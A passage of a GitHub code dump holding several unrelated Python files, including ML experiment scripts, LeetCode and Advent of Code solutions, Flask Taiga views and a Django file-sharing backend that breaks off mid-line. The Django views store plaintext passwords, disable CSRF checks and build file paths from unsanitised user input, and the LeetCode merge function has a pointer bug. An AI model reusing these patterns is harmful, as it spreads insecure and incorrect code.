All_rec.append(recall)\n All_ap.append(average_precision)\n All_recall_score.append(recall_score)\n All_precision_score.append(precision_score)\n All_confusion_matrix.append(confusion_matrix)\n\n print('Saving Results Per Experiment')\n\n np.save(save_location + '_AUC_Experiment_' + str(e) + '.npy', All_auc)\n np.save(save_location + '_PRE_Experiment_' + str(e) + '.npy', All_pre)\n np.save(save_location + '_REC_Experiment_' + str(e) + '.npy', All_rec)\n np.save(save_location+'_AVG_pre_' + str(e) + '.npy', All_ap)\n np.save(save_location+'_recall_score_' + str(e) + '.npy', All_recall_score)\n np.save(save_location+'_precision_score_' + str(e) + '.npy', All_precision_score)\n np.save(save_location+'_confusion_matrix' + str(e) + '.npy', All_confusion_matrix)\n print (\"===================== Experiment number \",e+1, \" completed======================== \" )\n e += 1\n if (e >= n_experiments ):\n break\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ds_type\", \"--dataset_type\", help=\" 0 => '0 Background', -1 -> '=1 Background', scaled_negative => 'Scaled negative background'\")\n parser.add_argument(\"-ovs\", \"--oversampled\", help =\"Oversampled training\", action=\"store_true\")\n parser.add_argument(\"-sr\", \"--slice_range\", help=\"Number of subset to consider\", default=6, type = int)\n parser.add_argument(\"-nexp\", \"--num_exp\", help=\"Number of experiments\", default=3, type = int)\n args = parser.parse_args()\n dataset_type = args.dataset_type\n oversample =args.oversampled\n slice_range = args.slice_range\n n_experiments = args.num_exp\n run()\n","repo_name":"charlesity/prostate_segmentation","sub_path":"cropped_data_experiment/active_deep_seg_random.py","file_name":"active_deep_seg_random.py","file_ext":"py","file_size_in_byte":12002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20341868171","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeKLists(self, lists):\n if (not lists):\n return None\n elif (len (lists) == 1):\n return lists[0]\n elif (len (lists) < 3):\n return self.merge (lists[0], lists[1])\n else:\n temp = self.merge (lists[0], lists[1])\n i = 2\n while (i < len (lists)):\n temp = self.merge (temp, lists[i])\n i += 1\n # self.print_l(temp)\n return temp\n\n def merge(self, l1, l2):\n point = head = ListNode (0)\n\n while l1 and l2:\n if l1.val <= l2.val:\n point.next = l1\n l1 = l1.next\n else:\n point.next = l2\n l2 = l1\n l1 = point.next.next\n point = point.next\n if not l1:\n point.next = l2\n else:\n point.next = l1\n return head.next","repo_name":"addherbs/LeetCode","sub_path":"Hard/mergeKsorted_2.py","file_name":"mergeKsorted_2.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29557837764","text":"from datetime import date, timedelta\nfrom datetime import datetime as dt\nfrom sqlalchemy import or_\nfrom flask import session\nfrom flask import request\nfrom flask import current_app\nfrom flask import url_for\nfrom flask import flash\nfrom flask import make_response\nfrom flask import redirect\nfrom flask import abort\nfrom flask import g\nfrom flask_login import login_required\nfrom .auth import current_user\nfrom .taiga import TaigaIssue\nfrom .libutils import calculate_ETAs\nfrom .libutils import get_user_uuid\nfrom .libutils import issues_waiting\nfrom .libutils import max_eta\nfrom .libutils import read_sprint_stats\n\nfrom .gantt import issues_gantt\nfrom .views import TemplateFinderViewBase\nfrom .model import Log\nfrom .model import SprintPoints\nfrom .model import db\n\n\nclass ProjectListView(TemplateFinderViewBase):\n\n @login_required\n def get(self):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n pl = current_app.taiga_client.get_projects()\n # print(\"ProjectListView.get(): pl = \", pl)\n for p in pl:\n p['issue_url'] = \"/projects/%d/issues\" % p['id']\n p['sprint_url'] = \"/projects/%d/sprints\" % p['id']\n context['projects'] = pl\n response = make_response(self.render_template(context))\n # print(\"uuid: \", user.get_id(), \", response: \", response)\n return response\n\n\nclass ProjectIssuesListView(TemplateFinderViewBase):\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n issues_graph_css_class=\"taigagantt\"\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n TaigaIssue.configure(tc, pid)\n il = tc.get_issues(pid=pid)\n # print(\"ProjectIssuesListView.get(): il = \", il)\n ig = dict(map(lambda x: (x.ref, x), il))\n # print(\"ProjectIssuesListView.get() after map(): il = \", il)\n # now calculate the ETAs for all issues:\n calculate_ETAs(ig)\n last_eta = max_eta(ig)\n tomorrow = date.today() + timedelta(days=1)\n flash(\"ETA for the last issue: \" + str(last_eta))\n waiting = issues_waiting(ig)\n if waiting > 0:\n flash(\"There are %d issues waiting\" % waiting)\n active = [ig[i] for i in ig if not ig[i].is_closed]\n aig = dict(map(lambda x: (x.ref, x), active))\n ganttchart = issues_gantt(aig)\n context['issues_graph_css_class'] = issues_graph_css_class\n context['graph'] = ganttchart\n context['issues'] = active\n context['tomorrow'] = tomorrow\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintsListView(TemplateFinderViewBase):\n \"\"\"list all the open sprints in this project\"\"\"\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n issues_graph_css_class=\"taigagantt\"\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n msts = tc.get_milestones(pid=pid)\n today = dt.today().date()\n print(\"ProjectSprintsListView(): msts = \", msts)\n sprintlist = []\n usedsprints = set()\n for mst in msts:\n mst.sprint_url = '/sprint/%d/user_stories' % mst.id\n mst.startdate = mst.estimated_start\n mst.enddate = dt.strptime(mst.estimated_finish, \"%Y-%m-%d\").date()\n # print(\"ProjectSprintsListView.get(): milestone = %s\" % mst)\n mst.is_open = not mst.closed\n if mst.enddate < today:\n mst.overdue = True\n if mst.is_open:\n sprintlist.append(mst)\n usedsprints.add(mst.id)\n else:\n mst.overdue = False\n for mst in msts:\n if mst.id not in usedsprints and mst.is_open \\\n and not mst.overdue:\n sprintlist.append(mst)\n usedsprints.add(mst.id)\n for mst in msts:\n if mst.closed:\n sprintlist.append(mst)\n print(\"ProjectSprintsListView(): sprintlist = \", sprintlist)\n context['sprints'] = sprintlist\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintDetailsView(TemplateFinderViewBase):\n \"\"\"list all the open user stories in this sprint\"\"\"\n\n @login_required\n def get(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n today = dt.today()\n msts = tc.get_milestones(pid=pid)\n usl = tc.get_userstories(pid=pid, sprintid=sprintid)\n # print(\"ProjectSprintDetailsView(): msts = \", msts)\n # print(\"ProjectSprintsDetailsView(): usl = \", usl)\n targetsprints = []\n sprinttitle = \"\"\n for mst in msts:\n mst.sprint_url = '/userstories?project=%d' % mst.id\n overdue = dt.strptime(mst.estimated_finish, \"%Y-%m-%d\") < today\n # print(\"ProjectSprintsDetailsView.get(): mst.id = %d, \"\n # \"overdue: %s, closed: %s\" % (mst.id, str(overdue), str(mst.closed)))\n if not mst.closed and mst.id != sprintid and not overdue:\n targetsprints.append(mst)\n if mst.id == sprintid:\n sprinttitle = mst.name\n print(\"found sprint title\", sprinttitle)\n # print(\" -- appended sprint %d\" % mst.id)\n sprint_points = 0\n userstories_ids = []\n # print(\"ProjectSprintsDetailsView.get(): sprintid = %d\" %\n # sprintid)\n for us in usl:\n print(\"ProjectSprintsDetailsView.get(): sprint_points = %d\" %\n sprint_points)\n if not us.is_closed:\n sprint_points += us.total_points\n userstories_ids.append(us.id)\n print(\"ProjectSprintsDetailsView.get(): open userstories = \",\n userstories_ids)\n context['sprintid'] = sprintid\n context['sprintname'] = sprinttitle\n context['sprintpoints'] = sprint_points\n context['sprints'] = targetsprints\n context['userstories'] = usl\n context['projectid'] = pid\n session['open_userstories'] = userstories_ids\n # import pdb; pdb.set_trace()\n response = make_response(self.render_template(context))\n return response\n\n @login_required\n def post(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n pc = request.path.split('/')\n pid = pc[2]\n # import pdb; pdb.set_trace()\n try:\n open_userstories = session['open_userstories']\n except:\n raise ValueError(\"\"\"Called from the wrong context: \"\"\"\n \"\"\"No user stories available.\"\"\")\n # don't do anything if the user pressed 'Cancel':\n if 'abort' in request.form:\n return redirect(url_for('project_sprint_list', pid=pid))\n next_sprint = request.form['next_sprint']\n if next_sprint == 'Z':\n flash(\"You need to make a choice for the next sprint\")\n return redirect(request.referer)\n # the user selected the backlog as the target:\n if next_sprint == 'Y':\n r = tc.reassign_userstories_and_close(pid,\n open_userstories,\n sprintid=\"null\")\n flash(\"status code: %d\" % r.status_code)\n return redirect(url_for('project_sprint_list', pid=pid))\n # TBD.\n if next_sprint == 'X':\n return redirect(url_for(\"create_new_sprint\"))\n # else:\n # the user selected the backlog as the target:\n r = tc.reassign_userstories_and_close(pid, open_userstories,\n next_sprint)\n flash(\"status code: %d\" % r.status_code)\n return redirect(url_for('project_sprint_list', pid=pid))\n\n\nclass ProjectSprintAdjustPointsView(TemplateFinderViewBase):\n \"\"\"let the user enter added or deleted points\"\"\"\n\n @login_required\n def get(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n\n tc.autologin()\n mst = tc.get_milestones(pid=pid, sprintid=sprintid)[0]\n context['sprintid'] = sprintid\n context['sprintname'] = mst.name\n context['points'] = mst.total_points\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n @login_required\n def post(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n now = dt.utcnow()\n mst = tc.get_milestones(pid=pid, sprintid=sprintid)[0]\n if 'currentpoints' not in request.form:\n raise ValueError(\"Form submission corrupted\")\n try:\n points = float(request.form['currentpoints'])\n except:\n points = 0.0\n sp = db.session.query(SprintPoints).filter_by(sprintid=sprintid).first()\n if not sp:\n sp = SprintPoints(sprintid=sprintid,\n who=user.name,\n sprintname=mst.name)\n start_points = sp.start_points or \"unset\"\n current_points = sp.current_points or \"unset\"\n print(\"start points: \", start_points,\n \", current points: \", current_points)\n logentry = \"Sprint %d: User '%s' set initial sprint points to %0.2f\" % (\n sprintid, user.name, points)\n if 'process_opening' in request.form:\n print(\" the user pressed the record button\")\n sp.start_points = points\n elif 'process_current' in request.form:\n logentry = \"Sprint %d: User '%s' updated sprint points to %0.2f\" % (\n sprintid, user.name, points)\n print(\" the user pressed the update button\")\n sp.current_points = points\n # fixup for our broken data set:\n if (sp.start_points is None or sp.start_points == 0.0) and \\\n sp.current_points is not None:\n sp.start_points = sp.current_points\n log = Log(timestamp=now, logentry=logentry)\n db.session.add(sp)\n db.session.add(log)\n db.session.commit()\n print(\"SprintPoints: \", sp)\n context['sprintid'] = sprintid\n context['sprintname'] = mst.name\n context['points'] = mst.total_points\n context['start_points'] = sp.start_points\n context['cur_points'] = sp.current_points\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintsStatsView(TemplateFinderViewBase):\n \"\"\"Generate graphs and tables out of the data delivered by the User\n Stories Report\n \"\"\"\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n tc = current_app.taiga_client\n tc.autologin()\n token = user.token\n now = dt.utcnow()\n cfg = current_app.config\n # print(\"UserStoriesStatsView.get%d): config= \" % pid, cfg)\n url = cfg['REPORTS']['project'][pid]['userstories']\n stats = read_sprint_stats(url)\n # now match against the sprint data in our own database\n db_sprints = []\n clauses = []\n for sprint in stats:\n # print(\"sprint = \", sprint)\n clauses.append(SprintPoints.sprintname==sprint)\n print(\"clauses: \", clauses)\n db_sprints = db.session.query(SprintPoints).filter(or_(*clauses)).all()\n print(\"db_sprints: \", db_sprints)\n context['pid'] = pid\n context['sprints'] = stats.values()\n response = make_response(self.render_template(context))\n return response\n","repo_name":"muellert/taigabuddy","sub_path":"src/main/projectviews.py","file_name":"projectviews.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3358044938","text":"import json\n\ndataset_name = input('Dataset name: ')\n\ntry:\n\twith open(f'{dataset_name}.json', encoding='ascii', errors='ignore') as f:\n\t\tdataset = json.load(f)\n\t\tdataset = [\n\t\t '\\n'.join([f'{heartbeat[\"project\"]}|{round(heartbeat[\"time\"])}'\n\t\t for heartbeat in day['heartbeats']])\n\t\t for day in dataset['days']\n\t\t]\nexcept FileNotFoundError:\n\tprint(f'Could not load {dataset_name}.json')\n\ndataset = '\\n'.join(dataset).replace('\\n\\n', '\\n')\n\nwith open(f'{dataset_name}.txt', 'w', encoding='utf-8', newline='\\n', errors='ignore') as f:\n\tf.write(dataset)\n","repo_name":"CelestialCrafter/graphs","sub_path":"codetime/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16057206757","text":"# Finds images from ID in our archive and dumps file locations to .json file\n# Only images where a specific treatment and medium were applied, captured before a cutoff period after inoculation, are considered\n# Optionally copies symlinks to images or image files themselves to pdump directory for inspection/download\n# This should read in arguments from the command line\n# First argument: experiment ID (e.g. QFA0060)\n# Second (optional) argument: cutoff time after inoculation (days)\n# If a cutoff time not specified, include all images\n\nimport sys\nimport argparse\nimport os\nimport pandas\nimport colonyzer2.functions as c2\nfrom datetime import datetime\nimport json\nimport shutil\nimport string\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \n\ndef parseArgs():\n parser=argparse.ArgumentParser(description=\"Get representative image of each plate in archive, sort by date, draw barcode on image and save (small) frame preview.\")\n parser.add_argument(\"pfmt\", type=str, help=\"Format of experiment. Can be one of 96, 384, 76, 1536 or Archive\")\n parser.add_argument(\"-d\",\"--dt\",type=float, help=\"Look for photos taken as close as possible to dt days after first photo.\", default=1.5)\n args = parser.parse_args()\n return(args)\n\ndef reframe(im,wtarg,htarg=0,fill=\"black\"):\n '''Resize image to new target width and height, preserving aspect ratio by adding borders (instead of by cropping).'''\n w,h=im.size\n if htarg==0:\n wsize,hsize=wtarg,int(round((float(wtarg)/w)*h))\n out=im.resize((wsize,hsize),Image.ANTIALIAS)\n elif float(w)/float(h)>=float(wtarg)/float(htarg):\n wsize,hsize=wtarg,int(round((float(wtarg)/float(w))*float(h)))\n tmp=im.resize((wsize,hsize),Image.ANTIALIAS)\n diff=htarg-hsize\n above=sum([x%2 for x in range(diff)])\n below=diff-above\n out=ImageOps.expand(tmp,border=(0,above,0,below),fill=fill)\n else:\n wsize,hsize=int(round((float(htarg)/float(h))*float(w))),htarg\n tmp=im.resize((wsize,hsize),Image.ANTIALIAS)\n diff=wtarg-wsize\n left=sum([x%2 for x in range(diff)])\n right=diff-left\n out=ImageOps.expand(tmp,border=(left,0,right,0),fill=fill)\n return(out)\n\ndef main():\n #sys.argv=['test', '384']\n args=parseArgs()\n pfmt=str(args.pfmt)\n dt=float(args.dt)\n # Should execute this script from LOGS3 directory\n rootDir=os.getcwd() \n\n # Search in some directories for images that can be analysed\n List_96=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_96\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_96\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_96\"]\n List_384=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM\"]\n List_768=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_768\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_768\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_768\"]\n List_1536=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_1536\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_1536\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_1536\"]\n Archive_384=[\"/home/yeastimages/ARCHIVE_IMAGES\"]\n\n searchOptions={\"96\":List_96,\"384\":List_384+Archive_384,\"768\":List_768,\"1536\":List_1536,\"Archive\":Archive_384}\n searchDirs=searchOptions[pfmt]\n\n barcLen=15 # Make this more general... Detect barcode based on date format instead...\n\n barcDict=c2.merge_lodols([c2.getBarcodes(directory,barcRange=(0,barcLen),checkDone=False) for directory in searchDirs])\n barcBest=c2.getNearest(barcDict,dt)\n barcDate={b:c2.getDate(barcBest[b]) for b in barcBest.keys()}\n sortedDate=sorted(barcDate,key=barcDate.get)\n sortedBarcs=sorted(barcDate.keys())\n \n dirname=\"pdump_\"+pfmt\n if os.name==\"posix\":\n font = ImageFont.truetype(\"/usr/share/fonts/truetype/msttcorefonts/arial.ttf\", 80)\n else:\n font = ImageFont.truetype(\"arial.ttf\", 80)\n if os.path.exists(dirname):\n shutil.rmtree(dirname)\n os.mkdir(dirname)\n for i,barc in enumerate(sortedBarcs):\n im=Image.open(barcBest[barc])\n im=reframe(im,1920,1080,fill=\"black\")\n draw = ImageDraw.Draw(im)\n draw.text((400, 200),barc,(255,255,255),font=font)\n draw.text((400, 300),str(barcDate[barc]),(255,255,255),font=font)\n im.save(os.path.join(dirname,pfmt+\"_Frame{:06d}.jpg\".format(i)))\n\nif __name__ == '__main__':\n main()\n\n \n \n","repo_name":"CnrLwlss/HTSauto","sub_path":"HTSscripts/C2MiddleVideo.py","file_name":"C2MiddleVideo.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44496935767","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom listener import Listener\nfrom referential_game_env import ReferentialGameEnv\n\nif __name__ == '__main__':\n listener = Listener(\n vocab_size=200,\n model_path=None\n ).cuda()\n\n envs = ReferentialGameEnv(\n max_len=20,\n eos_id=3,\n noop_penalty=0.5,\n length_penalty=0,\n batch_size=256,\n n_distr=2,\n game_file_path=\"game_file_hard_20.pt\"\n )\n\n dev_envs = ReferentialGameEnv(\n max_len=20,\n eos_id=3,\n noop_penalty=0.5,\n length_penalty=0,\n batch_size=256,\n n_distr=2,\n game_file_path=\"game_file_dev.pt\"\n )\n\n envs.game_file[\"sample_candidates\"] = envs.game_file[\"similarity_rank\"][:, :1000]\n dev_envs.game_file[\"sample_candidates\"] = dev_envs.game_file[\"similarity_rank\"][:, :1000]\n\n optimizer = torch.optim.Adam(listener.parameters())\n try: \n for i in range(100000):\n obs = envs.reset()\n captions = envs.game_file[\"captions\"][obs[\"images_ids\"][range(256), obs[\"goal\"]]]\n images = obs[\"images\"]\n spk_lens = envs._find_eos(captions)\n images = torch.from_numpy(images).cuda()\n captions = captions.cuda()\n spk_lens = torch.LongTensor(spk_lens).cuda()\n pred_out, logits = listener.predict(images, captions, spk_lens, output_logp=True)\n loss = F.cross_entropy(logits, torch.from_numpy(obs[\"goal\"]).cuda())\n accuracy = torch.mean((pred_out == torch.from_numpy(obs[\"goal\"]).cuda()).float())\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n if i % 1000 == 999:\n print(loss.item(), accuracy.item())\n with torch.no_grad():\n obs = dev_envs.reset()\n captions = dev_envs.game_file[\"captions\"][obs[\"images_ids\"][range(256), obs[\"goal\"]]]\n images = obs[\"images\"]\n spk_lens = dev_envs._find_eos(captions)\n images = torch.from_numpy(images).cuda()\n captions = captions.cuda()\n spk_lens = torch.LongTensor(spk_lens).cuda()\n pred_out, logits = listener.predict(images, captions, spk_lens, output_logp=True)\n loss = F.cross_entropy(logits, torch.from_numpy(obs[\"goal\"]).cuda())\n accuracy = torch.mean((pred_out == torch.from_numpy(obs[\"goal\"]).cuda()).float())\n print(loss.item(), accuracy.item())\n except KeyboardInterrupt:\n torch.save(listener.state_dict(), \"listener_200_hard_20.pt\")\n","repo_name":"neulab/ToM-Language-Acquisition","sub_path":"listener_pretraining.py","file_name":"listener_pretraining.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"32015666557","text":"#! /usr/bin/env python3\n\ndef count_increases():\n with open(\"day1/input.txt\") as depths:\n oldline = depths.readline()\n increases = 0\n for line in depths:\n if line <= oldline:\n continue\n else:\n increases += 1\n oldline = line\n return increases\n\ncount_increases()","repo_name":"Drtaylor1701/adventofcode","sub_path":"day1/depth_measurement.py","file_name":"depth_measurement.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14515382150","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n temp = x\n reverse = 0\n while x>0:\n last_digit = x%10\n reverse = reverse*10+last_digit\n x = x//10\n if temp == reverse:\n return True\n else:\n return False\n ","repo_name":"ishangogna/Leetcode","sub_path":"easy/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40926990951","text":"from django.http import HttpResponse, HttpResponseRedirect\nimport json\nimport django.contrib.auth as auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User as djUser\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import User, Folder, Data\nimport os\nimport socket\nimport zipfile\nimport datetime, time\nfrom yunpan.settings import DATA_FILE_PATH, TMP_FILE_PATH, HTTP_URL, PORT, DATA_FILE_URL, TMP_FILE_URL\n\n\n# Create your views here.\n\ndef quick_respone(ret = 200, dic = None):\n return HttpResponse(status=ret ,content=json.dumps(dic), content_type = 'application/json,charset=utf-8')\n\n\n@login_required()\n@csrf_exempt\ndef content(request):\n # 更新与获得用户信息\n\n user_name = request.user.username\n try:\n user = User.objects.get(user_name=user_name)\n except User.DoesNotExist:\n return quick_respone(404)\n\n if request.method == 'PUT':\n # 更新用户信息\n body_data = json.loads(request.body)\n user.user_name = body_data.get('user_name')\n user.real_name = body_data.get('real_name')\n user.student_id = body_data.get('student_id')\n user.gender = body_data.get('gender')\n user.user_class = body_data.get('class')\n user.phone = body_data.get('phone')\n user.mail = body_data.get('mail')\n user.save()\n return quick_respone()\n elif request.method == 'GET':\n # 返回用户信息\n ret_dict = dict()\n ret_dict['user_name'] = user.user_name\n ret_dict['real_name'] = user.real_name\n ret_dict['gender'] = user.gender\n ret_dict['student_id'] = user.student_id\n ret_dict['class'] = user.user_class\n ret_dict['mail'] = user.mail\n ret_dict['phone'] = user.phone\n return quick_respone(dic=ret_dict)\n return quick_respone(403)\n\n@csrf_exempt\ndef login(request):\n # 登录\n\n if request.method != 'POST':\n return quick_respone(403)\n\n if request.user.is_anonymous:\n body_data = json.loads(request.body)\n user_name = body_data.get('user_name')\n password = body_data.get('password')\n user = auth.authenticate(username = user_name, password = password)\n if not user:\n return quick_respone(ret = 401, dic={'message':'用户名或密码错误'})\n else:\n auth.login(request, user)\n return quick_respone()\n else:\n return quick_respone()\n\n\n@csrf_exempt\ndef register(request):\n # 注册\n \n if request.method != 'POST':\n return quick_respone(403)\n\n body_data = json.loads(request.body)\n user_name = body_data.get('user_name')\n real_name = body_data.get('real_name')\n student_id = body_data.get('student_id')\n password = body_data.get('password')\n\n if not user_name or not real_name or not student_id or not password:\n return quick_respone(ret = 403)\n\n try:\n user = User.objects.get(user_name=user_name)\n return quick_respone(ret=409, dic={'message': '用户名已存在'})\n except User.DoesNotExist:\n user = None\n\n try:\n user = User.objects.get(student_id=student_id)\n return quick_respone(ret=409, dic={'message': '学号已存在'})\n except User.DoesNotExist:\n user = None\n\n user = User()\n user.user_name= user_name\n user.password = password\n user.real_name = real_name\n user.student_id = student_id\n user.save()\n\n djUser.objects.create_user(username=user_name, password=password)\n\n return quick_respone()\n\n@csrf_exempt\n@login_required()\ndef folders(request):\n # 文件夹操作\n \n if request.method == 'GET':\n # 返回所有文件夹\n folders = Folder.objects.all()\n ret_list = []\n for folder in folders:\n item = dict()\n item['id'] = folder.id\n item['folder_name'] = folder.folder_name\n item['creator'] = folder.creator\n ret_list.append(item)\n return quick_respone(dic=ret_list)\n elif request.method == 'POST':\n # 创建一个文件夹\n body_data = json.loads(request.body)\n folder_name = body_data.get('folder_name')\n if not folder_name:\n return quick_respone(400)\n\n folder_path = os.path.join(DATA_FILE_PATH, folder_name)\n if os.path.exists(folder_path):\n return quick_respone(400)\n\n try:\n folder = Folder.objects.get(folder_name=folder_name)\n return quick_respone(409)\n except Folder.DoesNotExist:\n folder = None\n\n os.makedirs(folder_path)\n if not os.path.exists(folder_path):\n return quick_respone(400)\n\n user_name = request.user.username\n folder = Folder()\n folder.folder_name = folder_name\n folder.creator = user_name\n folder.save()\n\n return quick_respone()\n return quick_respone(403)\n\n@csrf_exempt\n@login_required()\ndef resources(request):\n # 资源操作\n \n if request.method == 'GET':\n user = request.GET.get('user', None)\n res_id = request.GET.get('res_id', None)\n if user:\n # 根据用户筛选资源\n ret_list = []\n if user == 'all':\n datas = Data.objects.filter(approved=True)\n else:\n datas = Data.objects.filter(uploader=user)\n for data in datas:\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n ret_list.append(item)\n return quick_respone(dic=ret_list)\n elif res_id:\n # 返回指定id的资源\n try:\n data = Data.objects.get(id = res_id)\n except Data.DoesNotExist:\n return quick_respone(404)\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n return quick_respone(dic=item)\n return quick_respone(403)\n\n elif request.method == 'POST':\n # 上传资源\n \n res_file = request.FILES.get('file', None)\n if not res_file:\n return quick_respone(403)\n\n file_name = res_file.name\n folder_id = request.POST.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = folder_id)\n except Folder.DoesNotExist:\n return quick_respone(400)\n\n try:\n res = Data.objects.get(folder_name=folder.folder_name, res_name=file_name)\n return quick_respone(400)\n except Data.DoesNotExist:\n res = None\n\n file_path = os.path.join(DATA_FILE_PATH, folder.folder_name, file_name)\n if os.path.exists(file_path):\n return quick_respone(409)\n\n with open(os.path.join(DATA_FILE_PATH, folder.folder_name, file_name), 'wb') as f:\n for line in res_file.chunks() :\n f.write(line)\n res = Data()\n res.uploader = request.user.username\n res.folder_name = folder.folder_name\n res.res_name = file_name\n res.approved = False\n res.save()\n\n return quick_respone()\n return quick_respone(403)\n\n@csrf_exempt\n@login_required()\ndef logout(request):\n # 登出\n if request.method != 'POST':\n return quick_respone(403)\n\n auth.logout(request)\n return quick_respone()\n\n@csrf_exempt\n@login_required()\ndef folder(request):\n # 文件夹的详情\n if request.method != 'GET':\n return quick_respone(403)\n\n folder_id = request.GET.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = folder_id)\n except Folder.DoesNotExist:\n return quick_respone(404)\n\n ret_dict = dict()\n ret_dict['folder_name'] = folder.folder_name\n ret_dict['creator'] = folder.creator\n ret_dict['resources'] = []\n datas = Data.objects.filter(folder_name=folder.folder_name)\n for data in datas:\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n ret_dict['resources'].append(item)\n return quick_respone(dic=ret_dict)\n\n@csrf_exempt\n@login_required()\ndef folder_download(request):\n # 文件夹打包下载\n if request.method != 'GET':\n return quick_respone(403)\n username = request.user.username\n\n folder_id = request.GET.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = folder_id)\n except Folder.DoesNotExist:\n return quick_respone(404)\n\n time_str = datetime.datetime.now().strftime('%Y%m%d')\n zip_file_path = os.path.join(TMP_FILE_PATH, '%s_%s_%s.zip' % (time_str, username, folder.folder_name))\n folder_path = os.path.join(DATA_FILE_PATH, folder.folder_name)\n\n zipf = zipfile.ZipFile(zip_file_path, 'w')\n pre_len = len(os.path.dirname(folder_path))\n for parent, dirnames, filenames in os.walk(folder_path):\n for filename in filenames:\n pathfile = os.path.join(parent, filename)\n arcname = pathfile[pre_len:].strip(os.path.sep) # 相对路径\n zipf.write(pathfile, arcname)\n zipf.close()\n\n download_url = '%s:%s%s%s' % (\n HTTP_URL, PORT, TMP_FILE_URL, '%s_%s_%s.zip' % (time_str, username, 